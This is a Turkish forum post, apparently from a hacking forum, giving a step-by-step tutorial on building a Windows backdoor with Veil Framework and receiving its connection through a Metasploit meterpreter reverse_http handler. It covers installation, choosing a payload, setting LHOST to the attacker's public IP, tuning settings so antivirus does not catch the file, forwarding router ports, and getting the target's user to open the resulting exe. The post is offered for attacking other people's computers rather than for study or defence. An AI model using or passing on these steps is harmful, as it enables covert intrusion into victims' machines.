İPUCU

Linux Linux İle İlgili Bilgi Paylaşım Platformu

Seçenekler

Veil Framework kullanımı///K4RLUK///

K4RLUK - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2019
Mesajlar:
34
Konular:
9
Teşekkür (Etti):
8
Teşekkür (Aldı):
5
Ticaret:
(0) %
16-06-2019 02:49
#1
Arrow
Veil Framework kullanımı///K4RLUK///
Merhaba arkadaşlar bu gün Veil ile backdoor nasıl oluşturulur ve M3tasploit üzerinden nasıl kullanılır onu anlatmak istiyorum.
Veil, backdoor için kullanılan payloadları içinde hazır olarak bulunduran bir araçtır.

1-KURULUM

Kod:
git clone https://github.com/Veil-Framework/Veil.git
yazıp toolu Kali bilgisayarımıza indirelim.



Kod:
cd Veil/config
yazıp Veil klasörü içindeki config klasörüne girelim ve setup.sh dosyasını çalıştıralım.



Continue with installation? sorusuna “yes” diyelim.





olarak devam edecek.

Burada Wine üzerinden Python kurulumu gerçekleştirecek. Çünkü Wine Windows uygulamalarını Linux üzerinde çalıştırmamıza yarar bundan dolayı Python’ un Windows sürümünü Kali bilgisayarımıza bir daha yükleyecek.



Finish diyelim.



Hemen ardından pywin32 ve pycrypto-2.6.1 kurlumu gelecek bunları da aynı şekilde next ve finish yapıp yükleyelim.
Bunların hemen ardından Ruby’ nin Windows sürümü kurulumu gelecek.



I accept the license’ ı işaretleyip next diyelim.



şeklinde bir uyarı verecek. Burada bize aynı klasörün mevcut olduğunu ve yine de yüklemek istiyor muyuz onu soracak. Yes diyelim ve Ruby’ nin kurulumunu gerçekleştirelim.

Bu sefer de AutoIt kurulumunu gerçekleştirmemizi isteyecek. AutoIt’ de bir programlama dilidir ve bunun için kurulum yapmamız gerek.



Next > I agree adımlarını takip edelim. Bizi böyle bir ekran karşılayacak



Burada sisteminiz eğer 32 bit ise x86’yı 64 bit ise x64’ü seçin.

Bu kısmı değişiklik yapmadan geçelim



Sonra next > next > install adımlarını takip edip kurulumu gerçekleştirelim.



Bütün kurulumlar bittiğinde bu ekran bizi bu ekran karşılayacak



cd yazıp klasörden çıkalım ve ardından:

Kod:
apt -y install veil
diyelim.



bu da bittikten sonra aşağıda ki komutu çalıştıralım:

Kod:
 /usr/share/veil/config/setup.sh --force --silent
bunu da yaptıktan sonra bizi aşağıdaki gibi bir ekran karşılayacak



Kod:
cd Veil
./Veil.py
yazıp toolu başlatalım

Toolun giriş ekranı aşağıdaki gibidir



2-KULLANIM

Kod:
cd Veil
./Veil.py
yazıp Veil’i başlatalım.



Avaible tools kısmında bize mevcut araçları gösteriyor. Terminale

Kod:
use 1
yazalım.

Açılan ekranda 41 adet payload olduğunu söylüyor. Payloadları görmek için:

Kod:
list
yazalım.





Böyle bir liste gelecek. Buradan kullanmak istediğimiz payloadı seçiyoruz örnek olarak 9 numaralı payloadı seçeceğim.
Kullanacağımız payloadı seçtikten sonra gerekli ayarları yapmak için bir ekran gelecek



Burada düzenlememiz gereken kısımlar:
LHOST
PROCESSORS
SLEEP

LHOST=Eğer uzaktaki bir bilgisayara saldıracaksak public ipmizi(Public ipnizi öğrenmek için: IP Sorgulama - IP Adresi Sorgulama ve IP No Bul adresine bakabilirsiniz), aynı ağda bulunduğumuz bir bilgisayara saldırmak istiyorsak da local ip adresimizi yazmalıyız.

Kod:
set LHOST public ipniz


Sleep ve processors kısmlarını ise anti virüs programlarına yakalanmamak için kendimize göre düzenlememiz gerekiyor.
Düzenlemek için:

Kod:
set SLEEP atamak istediğiniz değer
set PROCESSORS atamak istediğiniz değer
Gerekli ayarlamalardan sonra

Kod:
generate
yazıp backdoorumuzu oluşturalım.

Sonra bize oluşturduğumuz backdoor için ad soruyor herhangi bir şey yazın.





Backdoor oluşturduktan sonra modem ayarlarından port yönlendirmesi yapmamız gerek. Bunun için 192.168.1.1 yazıp modem ara yüzüne girmeliyiz. Sonra modemden port yönlendirme kısmına girip Kali bilgisayarımızda ki yerel ip adresimizi 8080 portuna yönlendirmeliyiz.

Port yönlendirmesini yaptıktan sonra M3tasploit’i açalım ve M3tasploit başladıktan sonra aşağıdaki satıları yazalım:

Kod:
use exploit/multi/handler


Sonra payloadımızı seçelim

Kod:
set PAYLOAD windows/meterpreter/reverse_http


Kod:
Show options
yazıp ayar ekranına gelelim.



Burada LHOST’a Kali bilgisayarımızda ki yerel ip adresimizi yazmalıyız.

Kod:
set LHOST yerel ipmiz
Ayarlarımızı yaptıktan sonra exploit yazıp oluşturduğumuz trojani hedef bilgisayara atmalıyız.



Oluşturduğumuz trojani bulmak için “var/lib/veil/output/compiled” klasörüne gitmeliyiz.



Sonra oluşturduğumuz exe dosyasını hedef bilgisayarın kullanıcısına açtırıp M3tasploit’den oturum gelmesini bekleyeceğiz. Sonra da Linux komutlarını kullanarak dosyalar arasında geçiş sağlayabiliriz.

---------------------
Bir ananın iki oğlu,
Bir amalın iki qolu.
O da ulu, bu da ulu
Azərbaycan - Türkiyə
Bahtiyar VAHAPZADE
Konu K4RLUK tarafından (16-06-2019 13:53 Saat 13:53 ) değiştirilmiştir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı